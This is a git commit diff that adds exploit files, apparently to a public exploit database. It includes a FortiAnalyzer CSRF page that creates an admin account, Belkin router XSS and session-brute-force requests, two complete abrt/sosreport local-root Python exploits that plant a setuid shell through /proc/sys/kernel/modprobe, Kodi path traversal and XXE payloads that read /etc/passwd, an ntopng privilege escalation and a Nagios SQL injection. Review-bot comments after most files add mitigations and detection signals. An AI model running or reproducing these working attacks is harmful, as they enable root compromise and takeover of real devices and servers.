DB: 2015-12-02
14 new exploits
parent e1b6ec4b24
commit b6f9265856
15 changed files with 36410 additions and 0 deletions
146
platforms/hardware/remote/38824.html
Executable file
@ -0,0 +1,146 @@
source: http://www.securityfocus.com/bid/63663/info

FortiAnalyzer is prone to a cross-site request-forgery vulnerability because it fails to properly validate HTTP requests.

Exploiting this issue may allow a remote attacker to perform certain unauthorized administrative actions in the context of the device running the affected application. Other attacks are also possible.

Versions prior to Fortianalyzer 4.3.7 and 5.0.5 are vulnerable.

<html>

<body onload="CSRF.submit();">

<html>

<body onload="CSRF.submit();">

<form id="csrf"
action="https://www.example.com/IP_Fortianalyzer/cgi-bin/module//sysmanager/admin/SYSAdminUserDialog";
method="post" name="CSRF">

<input name="userId" value="user.via.cfsr"> </input>

<input name="type" value="0"> </input>

<input name="rserver" value=""> </input>

<input name="lserver" value=""> </input>

<input name="subject" value=""> </input>

<input name="cacerts" value="Fortinet_CA2"> </input>

<input name="password" value="123456"> </input>

<input name="password_updated" value="1"> </input>

<input name="confirm_pwd" value="123456"> </input>

<input name="confirm_pwd_updated" value="1"> </input>

<input name="host_1" value="0.0.0.0/0.0.0.0"> </input>

<input name="host_2" value="255.255.255.255/255.255.255.255"> </input>

<input name="host_3" value="255.255.255.255/255.255.255.255"> </input>

<input name="host_4" value="255.255.255.255/255.255.255.255"> </input>

<input name="host_5" value="255.255.255.255/255.255.255.255"> </input>

<input name="host_6" value="255.255.255.255/255.255.255.255"> </input>

<input name="host_7" value="255.255.255.255/255.255.255.255"> </input>

<input name="host_8" value="255.255.255.255/255.255.255.255"> </input>

<input name="host_9" value="255.255.255.255/255.255.255.255"> </input>

<input name="host_10" value="255.255.255.255/255.255.255.255"> </input>

<input name="host6_1"
value="ffff:ffff:ffff:ffff:ffff:ffff:ffff:ffff/128"> </input>

<input name="host6_2"
value="ffff:ffff:ffff:ffff:ffff:ffff:ffff:ffff/128"> </input>

<input name="host6_3"
value="ffff:ffff:ffff:ffff:ffff:ffff:ffff:ffff/128"> </input>

<input name="host6_4"
value="ffff:ffff:ffff:ffff:ffff:ffff:ffff:ffff/128"> </input>

<input name="host6_5"
value="ffff:ffff:ffff:ffff:ffff:ffff:ffff:ffff/128"> </input>

<input name="host6_6"
value="ffff:ffff:ffff:ffff:ffff:ffff:ffff:ffff/128"> </input>

<input name="host6_7"
value="ffff:ffff:ffff:ffff:ffff:ffff:ffff:ffff/128"> </input>

<input name="host6_8"
value="ffff:ffff:ffff:ffff:ffff:ffff:ffff:ffff/128"> </input>

<input name="host6_9"
value="ffff:ffff:ffff:ffff:ffff:ffff:ffff:ffff/128"> </input>

<input name="host6_10"
value="ffff:ffff:ffff:ffff:ffff:ffff:ffff:ffff/128"> </input>

<input name="profile" value="Super_User"> </input>

<input name="alladomRDGrp" value="0"> </input>

<input name="_adom" value=""> </input>

<input name="allpackRDGrp" value="0"> </input>

<input name="_adom" value=""> </input>

<input name="allpackRDGrp" value="0"> </input>

<input name="_pack" value=""> </input>

<input name="desc" value=""> </input>

<input name="showForce" value="0"> </input>

<input name="numhosts" value="0"> </input>

<input name="numhosts6" value="3"> </input>

<input name="_comp_8" value="OK"> </input>

<input name="actionevent" value="new"> </input>

<input name="profileId" value=""> </input>

<input name="mgt" value=""> </input>

<input name="dashboard" value=""> </input>

<input name="dashboardmodal" value=""> </input>

<input name="csrf_token" value=""> </input>

</form>

</body>

</html>
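Review bot: the PoC markup opens `<html>` and `<body onload="CSRF.submit();">` twice but closes each only once, and the `action` attribute carries a stray `;` after its closing quote, so the file does not document a well-formed page. The security-relevant detail the advisory text leaves implicit is visible in the form itself: `csrf_token` is submitted empty and `actionevent=new` with `profile=Super_User` still goes through, which is what "fails to properly validate HTTP requests" means here. For the record, the fixed releases are 4.3.7 and 5.0.5, and a POST to SYSAdminUserDialog with an empty `csrf_token` is the thing to alert on in device access logs.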
120
platforms/hardware/webapps/38840.txt
Executable file
@ -0,0 +1,120 @@
##Full Disclosure:

#Exploit Title : Belkin N150 Wireless Home Router Multiple
Vulnerabilities
#Exploit Author : Rahul Pratap Singh
#Date : 30/Nov/2015
#Home Page Link : http://www.belkin.com
#Blog Url : 0x62626262.wordpress.com
#Linkedin : https://in.linkedin.com/in/rahulpratapsingh94
#Status : Not Patched

→ Vulnerability/BUG Report :

1)

• Vulnerability Title : HTML/Script Injection
• Version : F9K1009 v1
• Firmware : 1.00.09

→ Proof of Concept:

"InternetGatewayDevice.DeviceInfo.X_TWSZ-COM_Language" this parameter is
vulnerable.

https://0x62626262.wordpress.com/2015/11/30/belkin-n150-router-multiple-vulnerabilities/

→ Steps to Reproduce:

Send the following post request using Burpsuite,etc

POST /cgi-bin/webproc HTTP/1.1
Host: 192.168.2.1
User-Agent: Mozilla/5.0 (Windows NT 6.2; rv:35.0) Gecko/20100101
Firefox/35.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
DNT: 1
Referer:
http://192.168.2.1/cgi-bin/webproc?getpage=html/page.html&var:page=deviceinfo&var:oldpage=-
Cookie: sessionid=7cf2e9c5; auth=ok; expires=Sun, 15-May-2102 01:45:46 GMT
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 260

%3AInternetGatewayDevice.DeviceInfo.X_TWSZ-COM_Language="><script>alert("1")</script><script>"&obj-action=set&var%3Apage=deviceinfo&var%3Aerrorpage=deviceinfo&getpage=html%2Findex.html&errorpage=html%2Findex.html&var%3ACacheLastData=U1BBTl9UaW1lTnVtMT0%3D

2)

• Vulnerability Title : Session Hijacking
• Version : F9K1009 v1
• Firmware : 1.00.09

→ Proof of Concept:

Cookie: sessionid=7cf2e9c5; auth=ok; expires=Sun, 15-May-2102 01:45:46 GMT

sessionid is allocated using hex encoding and of fixed length i.e 8 .
Therefore, it is very easy to bruteforce it in feasible amount for time as
this session id ranges from 00000000 to ffffffff

→ Steps to Reproduce:

Send the following request using Burpsuite and Bruteforce the sessionid.

POST /cgi-bin/webproc HTTP/1.1
Host: 192.168.2.1
User-Agent: Mozilla/5.0 (Windows NT 6.2; rv:35.0) Gecko/20100101
Firefox/35.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
DNT: 1
Referer:
http://192.168.2.1/cgi-bin/webproc?getpage=html/page.html&var:page=deviceinfo&var:oldpage=-
Cookie: sessionid=7cf2e9c5; auth=ok; expires=Sun, 15-May-2102 01:45:46 GMT

3)

• Vulnerability Title : Telnet Enabled with Default Pass
• Version : F9K1009 v1
• Firmware : 1.00.09

→ Vulnerability Details:

Telnet protocol can be used by an attacker to gain remote access to the
router with root privileges.

→ Proof of Concept:

https://0x62626262.wordpress.com/2015/11/30/belkin-n150-router-multiple-vulnerabilities/

→ Steps to Reproduce:

1) Open terminal
2) Type following command:
telnet 192.168.2.1
3) Default user and pass is root:root

4)

• Vulnerability Title : Cross Site Request Forgery
• Version : F9K1009 v1
• Firmware : 1.00.09

→ Proof of Concept:

Request doesn't contain any CSRF-token. Therefore, requests can be forged.
It can be verified with any request.

Status:
Vendor Notified: 20 Oct 2015
Vendor Notified Again: 25 Nov 2015

No Response.

Full Disclosure: 30 Nov 2015

Ref:
https://0x62626262.wordpress.com/2015/11/30/balkin-n150-router-multiple-vulnerabilities/
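Review bot: the only remediation information in this file is `#Status : Not Patched` plus the vendor timeline at the bottom (notified 20 Oct and 25 Nov 2015, no response), and it should be stated next to the affected firmware line (F9K1009 v1, 1.00.09) so readers do not take that as a fixed version. Finding 2 rests entirely on the 8-hex-digit `sessionid` shown in the Cookie header, i.e. a 32-bit space; the mitigation is a longer, unpredictable session identifier and rate limiting on `/cgi-bin/webproc`, and a burst of requests with varying `sessionid` values to that path is the detection signal. Findings 3 and 4 are configuration issues (telnet with `root:root`, no CSRF token on any request) that an operator can mitigate by disabling telnet and changing the default credential even without a firmware update.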
114
platforms/linux/local/38832.py
Executable file
@ -0,0 +1,114 @@
#!/usr/bin/python
# CVE-2015-5287 (?)
# abrt/sosreport RHEL 7.0/7.1 local root
# rebel 09/2015

# [user@localhost ~]$ python sosreport-rhel7.py
# crashing pid 19143
# waiting for dump directory
# dump directory: /var/tmp/abrt/ccpp-2015-11-30-19:41:13-19143
# waiting for sosreport directory
# sosreport: sosreport-localhost.localdomain-20151130194114
# waiting for tmpfiles
# tmpfiles: ['tmpurfpyY', 'tmpYnCfnQ']
# moving directory
# moving tmpfiles
# tmpurfpyY -> tmpurfpyY.old
# tmpYnCfnQ -> tmpYnCfnQ.old
# waiting for sosreport to finish (can take several minutes)........................................done
# success
# bash-4.2# id
# uid=0(root) gid=1000(user) groups=0(root),1000(user) context=unconfined_u:unconfined_r:unconfined_t:s0-s0:c0.c1023
# bash-4.2# cat /etc/redhat-release
# Red Hat Enterprise Linux Server release 7.1 (Maipo)

import os,sys,glob,time,sys,socket

payload = "#!/bin/sh\ncp /bin/sh /tmp/sh\nchmod 6755 /tmp/sh\n"

pid = os.fork()

if pid == 0:
    os.execl("/usr/bin/sleep","sleep","100")

time.sleep(0.5)

print "crashing pid %d" % pid

os.kill(pid,11)

print "waiting for dump directory"

def waitpath(p):
    while 1:
        r = glob.glob(p)
        if len(r) > 0:
            return r
        time.sleep(0.05)

dumpdir = waitpath("/var/tmp/abrt/cc*%d" % pid)[0]

print "dump directory: ", dumpdir

os.chdir(dumpdir)

print "waiting for sosreport directory"

sosreport = waitpath("sosreport-*")[0]

print "sosreport: ", sosreport

print "waiting for tmpfiles"
tmpfiles = waitpath("tmp*")

print "tmpfiles: ", tmpfiles

print "moving directory"

os.rename(sosreport, sosreport + ".old")
os.mkdir(sosreport)
os.chmod(sosreport,0777)

os.mkdir(sosreport + "/sos_logs")
os.chmod(sosreport + "/sos_logs",0777)

os.symlink("/proc/sys/kernel/modprobe",sosreport + "/sos_logs/sos.log")
os.symlink("/proc/sys/kernel/modprobe",sosreport + "/sos_logs/ui.log")

print "moving tmpfiles"

for x in tmpfiles:
    print "%s -> %s" % (x,x + ".old")
    os.rename(x, x + ".old")
    open(x, "w+").write("/tmp/hax.sh\n")
    os.chmod(x,0666)


os.chdir("/")

sys.stderr.write("waiting for sosreport to finish (can take several minutes)..")


def trigger():
    open("/tmp/hax.sh","w+").write(payload)
    os.chmod("/tmp/hax.sh",0755)
    try: socket.socket(socket.AF_INET,socket.SOCK_STREAM,132)
    except: pass
    time.sleep(0.5)
    try:
        os.stat("/tmp/sh")
    except:
        print "could not create suid"
        sys.exit(-1)
    print "success"
    os.execl("/tmp/sh","sh","-p","-c",'''echo /sbin/modprobe > /proc/sys/kernel/modprobe;rm -f /tmp/sh;python -c "import os;os.setresuid(0,0,0);os.execl('/bin/bash','bash');"''')
    sys.exit(-1)

for x in xrange(0,60*10):
    if "/tmp/hax" in open("/proc/sys/kernel/modprobe").read():
        print "done"
        trigger()
    time.sleep(1)
    sys.stderr.write(".")

print "timed out"
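Review bot: the header marks the identifier as uncertain (`CVE-2015-5287 (?)`) while the sibling file 38835.py in this same commit lists CVE-2015-5287 alongside CVE-2015-5273 for the abrt-hook-ccpp and abrt-action-install-debuginfo issues, so the record should say which component this file actually concerns: from the code it is the sosreport run that abrt starts in its dump directory, whose `sos_logs/sos.log` and `sos_logs/ui.log` are replaced by symlinks to `/proc/sys/kernel/modprobe` and whose `tmp*` files are swapped for a file naming `/tmp/hax.sh`. Style: `sys` appears twice on the import line. For defenders, the observables on the page are a world-writable (0777) sosreport directory under `/var/tmp/abrt/ccpp-*` and `/proc/sys/kernel/modprobe` set to a path under `/tmp`; checking that sysctl value against `/sbin/modprobe` and the ownership of the abrt dump directories catches this class of issue on RHEL 7.0/7.1 hosts.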
117
platforms/linux/remote/38826.py
Executable file
@ -0,0 +1,117 @@
source: http://www.securityfocus.com/bid/63743/info

Linux Kernel is prone to an information-disclosure vulnerability.

An attacker can exploit this issue to obtain sensitive information like original MAC address; information obtained may aid in other attacks.

Note: This BID was previously titled 'Atheros Wireless Drivers MAC Address Information Disclosure Vulnerability'. The title and technical details have been changed to better reflect the underlying component affected.

#!/usr/bin/python
import logging
logging.getLogger("scapy.runtime").setLevel(logging.ERROR)
from scapy.all import *
import random

# number of times to inject probe for one bit (combat packet loss)
ATTEMPTS_PER_BIT = 6
# time to wait for ACK in seconds
SNIFFTIME = 0.3


def randmac():
    mac = [0] * 6
    for i in xrange(6):
        mac[i] = random.randint(0, 256)

    # avoid multicast/broadcast mac
    mac[0] = mac[0] & 0xFE

    return ":".join([format(byte, '02x') for byte in mac])


def parsemac(macstr):
    parts = macstr.replace("-", ":").split(":")
    if len(parts) != 6:
        raise ValueError("MAC does not consist of 6 parts (separated by : or -)")

    return [int(byte, 16) for byte in parts]


def is_ack(p):
    return Dot11 in p and p.type == 1 and p.subtype == 13


def find_fixed_bits(s, mac):
    # eventually contains the real MAC address
    orgmac = [0] * 6

    # random MAC address, used as sender, to which the target will send an ACK
    srcmac = randmac()

    # for all the bits - FIXME: Don't consider H.O. bit of first MAC byte
    for i in range(6):
        for bit in range(8):
            # flip the bit at current position
            currbit = mac[i] & (1 << bit)
            mac[i] ^= (1 << bit)

            # convert modified mac to string
            strmac = ":".join([format(byte, '02x') for byte in mac])
            print "Probing", strmac, "...",

            replied = False
            for attempt in range(ATTEMPTS_PER_BIT):
                # inject data packet to modified MAC address
                packet = Dot11(type="Data", subtype=4, FCfield="from-DS",
                    addr1=strmac, addr2=srcmac, addr3=strmac)
                s.send(RadioTap()/packet)

                # Sniff air for ACK to modified MAC
                l = sniff(lfilter=lambda p: is_ack(p) and p.addr1 == srcmac, count=1,
                    timeout=SNIFFTIME, opened_socket=s)

                # We we got an ACK, don't need to try again
                if len(l) == 1:
                    replied = True
                    break

            print replied

            # If client replied, original bit is different from the one currently set,
            # otherwise it's equal to original bit.
            if replied:
                orgmac[i] |= (~currbit) & (1 << bit)
            else:
                orgmac[i] |= currbit

            # flip bit back to original value
            mac[i] ^= (1 << bit)

    # Done, return original MAC
    return orgmac


if __name__ == "__main__":
    if len(sys.argv) != 3:
        print "Usage:", sys.argv[0], "interface macaddr"
        quit(1)

    try:
        mac = parsemac(sys.argv[2])
        conf.iface = sys.argv[1]

        random.seed()

        # Open up read/write socket so we don't miss the ACK
        L2socket = conf.L2socket
        s = L2socket(type=ETH_P_ALL, iface=conf.iface)

        # Now find the MAC
        orgmac = find_fixed_bits(s, mac)
        s.close()

        print "\nReal MAC address:", ":".join(format(byte, "02x") for byte in orgmac), "\n"
    except ValueError, e:
        print "Invalid MAC address:", e
    except socket.error, e:
        print "Error with provided interface:", e
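Review bot: the file carries only the SecurityFocus summary and no description of the mechanism, so the record should state what the code shows: for each of the 48 bits of the supplied (currently configured) MAC it sends a data frame to the address with that bit flipped and watches for an ACK (`is_ack`: type 1, subtype 13) back to the random sender address; whether the target acknowledges the flipped address decides that bit of the original address (`orgmac`), which is why the advisory calls it a disclosure of the "original MAC address" despite a changed one. Two loose ends in the code: the FIXME about the high-order bit of the first byte is unresolved, and `random.randint(0, 256)` is inclusive, so `randmac()` can produce a byte value of 256 and a malformed sender address (`format(256, '02x')` yields three digits). Comment typo: "We we got an ACK". Mitigation is on the kernel/driver side (the BID was retitled from the Atheros driver to the Linux kernel), not something the user of a randomised MAC can configure around.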
21
platforms/linux/webapps/38833.txt
Executable file
@ -0,0 +1,21 @@
# Exploit Title: arbitrary file access kodi web interface
# Shodan dork: title:kodi
# Date: 25-11-2015
# Contact: https://twitter.com/mpronk89
# Software Link: http://kodi.tv/
# Original report:
http://forum.kodi.tv/showthread.php?tid=144110&pid=2170305#pid2170305
# Version: v15
# Tested on: linux
# CVE : n/a

kodi web interface vulnerable to arbitrary file read.

example:
<ip>:<port:/%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd

for passwd

(issue fixed in 2012, reintroduced in february 2015. Fixed again november
2015 for v16)
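Review bot: the example URL has a typo (`<port:` where `<port>` is meant), and the file's only remediation data is the closing parenthetical, so the record should state up front that v15 is affected, that v16 (November 2015) fixes it, and that this is a regression of a fix made in 2012, which is the detail a defender tracking Kodi versions needs. The traversal is entirely URL-encoded (`%2f..%2f`), so a request path against the Kodi web port containing `%2f..` or `..%2f` is a direct detection signature, and the regression history is an argument for a regression test on the web interface's path handling rather than a one-off patch.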
219
platforms/multiple/local/38835.py
Executable file
@ -0,0 +1,219 @@
#!/usr/bin/python
# CVE-2015-5273 + CVE-2015-5287
# CENTOS 7.1/Fedora22 local root (probably works on SL and older versions too)
# abrt-hook-ccpp insecure open() usage + abrt-action-install-debuginfo insecure temp directory usage
# rebel 09/2015
# ----------------------------------------

# [user@localhost ~]$ id
# uid=1000(user) gid=1000(user) groups=1000(user) context=unconfined_u:unconfined_r:unconfined_t:s0-s0:c0.c1023
# [user@localhost ~]$ cat /etc/redhat-release
# CentOS Linux release 7.1.1503 (Core)
# [user@localhost ~]$ python abrt-centos-fedora.py
# -- lots of boring output, might take a while on a slow connection --
# /var/spool/abrt/abrt-hax-coredump created
# executing crashing process..
# success
# bash-4.2# id
# uid=0(root) gid=1000(user) groups=0(root),1000(user) context=unconfined_u:unconfined_r:unconfined_t:s0-s0:c0.c1023


import time,os,datetime,sys,resource,socket


fedora = "Fedora" in open("/etc/redhat-release").read()

# mkdir dir1
# ln -s /var/spool/abrt dir1/hax
# mkdir dir2
# mkdir dir2/hax
# ln -s /proc/sys/kernel/modprobe dir2/hax/abrt-hax-coredump
# cd dir1
# find . -depth -print | cpio -o > ../cpio1
# cd ../dir2
# find . -depth -print | cpio -o > ../cpio2

cpio1 = 'x\x9c;^\xc8\xcc\xa1\xb0\xef\xff\xc2\x17\xcc/\x98\x19\x19\x18\x18>\x86\xde\xdc\xc8\x02\xa4\xf9\x192\x12+\x18\xf4\xcb\x12\x8b\xf4\x8b\x0b\xf2\xf3s\xf4\x13\x93\x8aJ\x18\x8e\x03U\xb3\xef\xfb\xeb\x08R\xcd\x04U\r\xa2\x19\x18\xf4\x80r\x0cp\xc0\x08\xa5\xb9\xc1dH\x90\xa3\xa7\x8fk\x90\xa2\xa2"\xc3(\x18d\x00\x00\x16\xb9\x1bA'.decode("zip")
cpio2 = 'x\x9c;^\xc8\xcc\x917\xfb\xff\xc2\x17\xcc/\x98\x19\x19\x18\x18>\x86\xde\xdc(\x06\xa4%\x192\x12+\xf4\x13\x93\x8aJt\x81\x0c\xdd\xe4\xfc\xa2\xd4\x94\xd2\xdc\x02\x06\xfd\x82\xa2\xfcd\xfd\xe2\xcab\xfd\xec\xd4\xa2\xbc\xd4\x1c\xfd\xdc\xfc\x14\xa0PR*\xc3q\xa0I\x19\xb3\xff:\x82Lb\x82\x9a\xc4\xc2\x00\x02@\x03\xc0\xb2+\xef@d\x99\xa1\xb2L`Y=\xa0\x1c\x03\x1c0Bin0\x19\x12\xe4\xe8\xe9\xe3\x1a\xa4\xa8\xa8\xc80\nh\x02\x00\x01\x980\x88'.decode("zip")

if fedora:
    cpio1 = cpio1.replace("/var/spool/abrt","/var/tmp///abrt")

payload = "#!/bin/sh\ncp /bin/sh /tmp/sh\nchmod 6755 /tmp/sh\n"


# we use a 32 bit binary because [vsyscall] will be at the end of the coredump on 64 bit binaries
# and we can't control the contents of that region. on 32 bit binaries [stack] is at the end

# the crashing binary will just fill the stack with /tmp/hax.sh which subsequently gets written
# to /proc/sys/kernel/modprobe by /usr/libexec/abrt-hook-ccpp

elf = 'x\x9c\xabw\xf5qcddd\x80\x01&\x06f\x06\x10/\xa4\x81\x85\xc3\x84\x01\x01L\x18\x14\x18`\xaa\xe0\xaa\x81j@x1\x90\t\xc2\xac 1\x01\x06\x06\x97F\x1b\x15\xfd\x92\xdc\x82\xd2o\x8dg\xfe\xf3\x03\xf9\xbb\xbe\x00\xb5\xec\x14\x01\xca\xee\xee\x07\xaa\xd7<\xd3\xc5\xdc\xc1\xa2\xe2\xe2\xfc\xe8{\xf3\x1b\x11\xaf\xe6_\x0c\xa5\x8fv8\x02\xc1\xff\x07\xfaP\x00\xd4\xad\x9f\x91X\xa1W\x9c\xc1\xc5\x00\x00-f"X'.decode("zip")

# most people don't have nasm installed so i preassembled it
# if you're not brave enough to run the preassembled file, here's the code :)

"""
; abrt-hax.asm
; nasm -f bin -o abrt-hax abrt-hax.asm
BITS 32
org 0x08048000
ehdr: ; Elf32_Ehdr
db 0x7F, "ELF", 1, 1, 1, 0 ; e_ident
times 8 db 0
dw 2 ; e_type
dw 3 ; e_machine
dd 1 ; e_version
dd _start ; e_entry
dd phdr - $$ ; e_phoff
dd 0 ; e_shoff
dd 0 ; e_flags
dw ehdrsize ; e_ehsize
dw phdrsize ; e_phentsize
dw 1 ; e_phnum
dw 0 ; e_shentsize
dw 0 ; e_shnum
dw 0 ; e_shstrndx
ehdrsize equ $ - ehdr
phdr: ; Elf32_Phdr
dd 1 ; p_type
dd 0 ; p_offset
dd $$ ; p_vaddr
dd $$ ; p_paddr
dd filesize ; p_filesz
dd filesize ; p_memsz
dd 5 ; p_flags
dd 0x1000 ; p_align
phdrsize equ $ - phdr

_start:
inc esp
cmp dword [esp],0x706d742f
jne l
or esp,0xfff
inc esp
mov edx,500
l3:
mov ecx,msglen
mov ebx,message
sub esp,ecx
l2:
mov al,[ebx]
mov [esp],al
inc esp
inc ebx
loop l2
sub esp,msglen
dec edx
cmp edx,0
jne l3
mov eax,0x41414141
jmp eax
message db '////////tmp/hax.sh',0x0a,0
msglen equ $-message
"""



build_id = os.popen("eu-readelf -n /usr/bin/hostname").readlines()[-1].split()[-1]

os.chdir("/tmp")


open("build_ids","w+").write(build_id + "\n")

print build_id


def child():
    timestamp = int(time.time())

    for i in xrange(0,3):
        try:
            t = datetime.datetime.fromtimestamp(timestamp+i)
            d = "/var/tmp/abrt-tmp-debuginfo-%s.%u" % (t.strftime("%Y-%m-%d-%H:%M:%S"), os.getpid())
            os.mkdir(d)
            os.chmod(d,0777)
            os.symlink("/var/tmp/haxfifo",d+"/unpacked.cpio")
            print "created %s" % d
        except: pass

    os.execl("/usr/libexec/abrt-action-install-debuginfo-to-abrt-cache","abrt-action-install-debuginfo-to-abrt-cache","-y")

try:
    os.mkfifo("/var/tmp/haxfifo")
    os.chmod("/var/tmp/haxfifo",0666)
except:
    pass

def fifo(a):
    print "reading from fifo.."
    open("/var/tmp/haxfifo").read()
    print "done"

    print "writing to fifo.."
    open("/var/tmp/haxfifo","w+").write(a)
    print "done"

if os.fork() == 0: child()

print "first cpio..."
fifo(cpio1)

os.wait()
time.sleep(1)

if os.fork() == 0: child()
print "second cpio..."
fifo(cpio2)

os.wait()
time.sleep(1)

if fedora:
    sym = "/var/tmp/abrt/abrt-hax-coredump"
else:
    sym = "/var/spool/abrt/abrt-hax-coredump"

try:
    os.lstat(sym)
except:
    print "could not create symlink"
    sys.exit(-1)

print "%s created" % sym

open("/tmp/abrt-hax","w+").write(elf)
os.chmod("/tmp/abrt-hax",0755)

if os.fork() == 0:
    resource.setrlimit(resource.RLIMIT_CORE,(resource.RLIM_INFINITY,resource.RLIM_INFINITY,))
    print "executing crashing process.."
    os.execle("/tmp/abrt-hax","",{})

os.wait()
time.sleep(1)

if "/tmp/hax" not in open("/proc/sys/kernel/modprobe").read():
    print "could not modify /proc/sys/kernel/modprobe"
    sys.exit(-1)

open("/tmp/hax.sh","w+").write(payload)
os.chmod("/tmp/hax.sh",0755)

try:
    socket.socket(socket.AF_INET,socket.SOCK_STREAM,132)
except:
    pass

time.sleep(0.5)

try:
    os.stat("/tmp/sh")
except:
    print "could not create suid"
    sys.exit(-1)

print "success"

os.execl("/tmp/sh","sh","-p","-c",'''echo /sbin/modprobe > /proc/sys/kernel/modprobe;rm -f /tmp/sh;rm -rf /var/cache/abrt-di/hax;python -c "import os;os.setresuid(0,0,0);os.execl('/bin/bash','bash');"''')
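Review bot: the embedded nasm listing references `filesize` (p_filesz/p_memsz) and jumps to a label `l` (`jne l`) but defines neither, so the source shown does not assemble as-is and does not fully document the preassembled `elf` string; the record should say so rather than present the listing as the blob's source. The header pairs two CVEs with two abrt components (abrt-hook-ccpp `open()` usage, abrt-action-install-debuginfo temp directory) without saying which identifier belongs to which. Defender-side, the artefacts the code leaves are all on the page: world-writable `/var/tmp/abrt-tmp-debuginfo-<timestamp>.<pid>` directories whose `unpacked.cpio` is a symlink to a FIFO, a symlink named `abrt-hax-coredump` in `/var/spool/abrt` (or `/var/tmp/abrt` on Fedora), a `build_ids` file in /tmp, and `/proc/sys/kernel/modprobe` pointing under `/tmp`; monitoring the abrt spool for symlinks and pinning that sysctl to `/sbin/modprobe` covers both bugs on CentOS 7.1 / Fedora 22 until abrt is updated.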
22
platforms/multiple/remote/38825.xml
Executable file
@ -0,0 +1,22 @@
source: http://www.securityfocus.com/bid/63719/info

IBM Cognos Business Intelligence is prone to an information-disclosure vulnerability due to an error when parsing XML external entities.

An attacker can exploit this issue to gain access to sensitive information; this may lead to further attacks.

IBM Cognos Business Intelligence 10.2.1 and prior are vulnerable.

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE foo [
<!ELEMENT comments ANY >
<!ENTITY xxe SYSTEM "file:///etc/passwd" > ]>

<ob:Openbravo xmlns:ob="http://www.example.com"
xmlns:xsi="http://www.example1.com/2001/XMLSchema-instance">
<Product id="C970393BDF6C43E2B030D23482D88EED" identifier="Zumo de Piñ,5L">
<id>C970393BDF6C43E2B030D23482D88EED</id>
<comments>&xxe;</comments>
</Product>
</ob:Openbravo>
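Review bot: the PoC document is an Openbravo payload (`ob:Openbravo` root, `Product` element, placeholder example.com namespaces) while the advisory text concerns IBM Cognos Business Intelligence, and the file names no endpoint or request that would accept it; the record should flag the mismatch and note that only the DOCTYPE part (the `SYSTEM "file:///etc/passwd"` entity expanded via `&xxe;`) is product-independent. The affected-versions line (10.2.1 and prior) is the only remediation data present. For the class of bug, the mitigation is to disable external entity and DTD processing in the XML parser, and an inbound DOCTYPE containing `<!ENTITY ... SYSTEM` is a reliable detection signature at the application or WAF layer.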
24
platforms/multiple/webapps/38836.txt
Executable file
@ -0,0 +1,24 @@
# Vulnerability title: ntop-ng <= 2.0.151021 - Privilege Escalation
# Author: Dolev Farhi
# Contact: dolev at flaresec.com
# Vulnerable version: 2.0.151021
# Fixed version: 2.2
# Link: ntop.org
# Date 27.11.2015
# CVE-2015-8368

# Product Details:
ntopng is the next generation version of the original ntop, a network traffic probe that shows the network usage, similar to what the popular top Unix command does. ntopng is based on libpcap and it has been written in a portable way in order to virtually run on every Unix platform, MacOSX and on Windows as well.

# Vulnerability Details:
in the latest stable release of ntop-ng it is possible to escalate the privileges of a non-privileged user to the admin account by resetting the password, intercepting the request and replacing the HTTP parameters.

# Vulnerability Proof of concept
1. Login with an unprivileged account
2. Change the account password and intercept the request, modify the username= and Cookie user= and change to the admin account
Example:
GET /lua/admin/password_reset.lua?csrf=XXXXXXXXXXXXXXXXXX&username=admin&old_password=12345&new_password=123456&confirm_new_password=123456 HTTP/1.1
Cookie: user=admin; session=XXXXXXXXXXXXXXXXXXXXXXXXX
3. Login with the admin account and the password you defined in step #3.

Voila! you're an administrator.
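Review bot: step 3 says "the password you defined in step #3"; the password is set in step 2. The root cause visible in the example request is that `/lua/admin/password_reset.lua` trusts the client-supplied `username` parameter and `user` cookie instead of the user bound to the `session` cookie, so the expected fix (2.2 per the header, CVE-2015-8368) is to derive the account from the authenticated session server-side. For detection, a `password_reset.lua` request whose `username` or `user` value differs from the session's owner is the anomaly to alert on, and the `old_password` field being checked against the attacker's own password rather than the target account's is the second check an operator should confirm is fixed.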
19
platforms/php/remote/38827.txt
Executable file
@ -0,0 +1,19 @@
source: http://www.securityfocus.com/bid/63754/info

Nagios XI is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.

Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.

Versions prior to Nagios XI 2012R2.4 are vulnerable.

POST /nagiosql/index.php HTTP/1.1
Host: localhost
Content-Length: 69
Origin: http://locahost
User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/29.0.1547.76
Safari/537.36
Content-Type: application/x-www-form-urlencoded
Referer: http://localhost/nagiosql/
Cookie: PHPSESSID=httj04vv2g028sbs73v9dqoqs3

tfUsername=test&tfPassword=%27%29+OR+1%3D1+limit+1%3B--+&Submit=Login
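Review bot: the injection point is the `tfPassword` field of the bundled NagiosQL login form (`POST /nagiosql/index.php`), which the advisory text never names; the record should. The decoded value `') OR 1=1 limit 1;-- ` shows the password is concatenated into the login query inside a quoted, parenthesised expression, so the fix is a parameterised query (and the header states versions prior to Nagios XI 2012R2.4 are affected). Minor: the captured `Origin: http://locahost` header is a typo. A login POST whose `tfPassword` contains a quote followed by `OR` or `--` is the obvious signature for web-log review.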
54
platforms/php/webapps/38828.php
Executable file
@ -0,0 +1,54 @@
source: http://www.securityfocus.com/bid/63771/info

Limonade framework is prone to a local file-disclosure vulnerability because it fails to sanitize user-supplied input.

An attacker may leverage this issue to obtain sensitive information from local files on computers running the vulnerable application. This may aid in further attacks.

Limonade framework 3.0 vulnerable; other versions may also be affected.

<?php
/** To prevent of time out **/
set_time_limit(0);

/** Error reporting **/
error_reporting(0);

/** Necessary variables **/
$url = $argv[1];
$data = $argv[2];
$needle = $argv[3];

/** Curl function with appropriate adjustments **/
function CurlPost($url='localhost',$data=array())
{
    $ch = curl_init();
    curl_setopt($ch,CURLOPT_URL,$url);
    curl_setopt($ch,CURLOPT_SSL_VERIFYPEER,FALSE);
    curl_setopt($ch,CURLOPT_SSL_VERIFYHOST,2);
